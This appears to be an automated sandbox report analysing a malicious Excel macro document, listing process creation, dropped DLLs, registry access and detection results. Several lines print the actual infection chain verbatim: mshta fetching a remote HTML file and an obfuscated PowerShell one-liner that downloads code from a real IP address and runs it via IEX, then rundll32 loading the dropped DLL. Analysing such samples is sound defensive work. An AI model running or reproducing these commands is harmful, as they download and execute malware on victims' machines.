Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_006DE249 DeleteService,

13_2_006DE249

Source: 1162545482187818.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\1162545482187818.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Yjtipscuxmuubs\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100359C1 appears 46 times

Source: 1162545482187818.xls	OLE indicator, VBA macros: true
Source: 1162545482187818.xls.0.dr	OLE indicator, VBA macros: true

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@25/9@2/48

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 1162545482187818.xls	OLE indicator, Workbook stream: true
Source: 1162545482187818.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,

9_2_100125C0

Source: 1162545482187818.xls	Virustotal: Detection: 12%
Source: 1162545482187818.xls	ReversingLabs: Detection: 18%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................P...............................P.......................`I.........v.....................K......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....................................}..v....0.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k..... ..............................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................{..k....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................{..k....x...............................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#..................k....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#..................k....(...............................}..v....H.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'..................k....E...............................}..v............0...............x...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+..................k....E...............................}..v....p.......0...............x...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.................".....:.......................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",JsCTpK
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",XsUjAXLCR
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",XxjhIN
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",JsCTpK	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",XsUjAXLCR	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",XxjhIN	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE629.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp

Source: 473D.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\System32\mshta.exe	Code function: 4_3_035708CF push 8B4902B3h; iretd	4_3_035708D4
Source: C:\Windows\System32\mshta.exe	Code function: 4_3_035700BE push 8B4902B3h; iretd	4_3_035700C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10032B7D push ecx; ret	9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10030DFF push ecx; ret	9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10032B7D push ecx; ret	11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10030DFF push ecx; ret	11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00720C04 push ss; ret	13_2_00720E40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00720F14 push FFFFFFF8h; retf	13_2_00720F23

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

9_2_1003D873

Source: JooSee.dll.6.dr

Static PE information: real checksum: 0x8df98 should be: 0x88dab

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb (copy)			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\JooSee.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb (copy)

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100134F0 IsIconic,	9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,	9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100134F0 IsIconic,	11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,	11_2_10018C9A

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
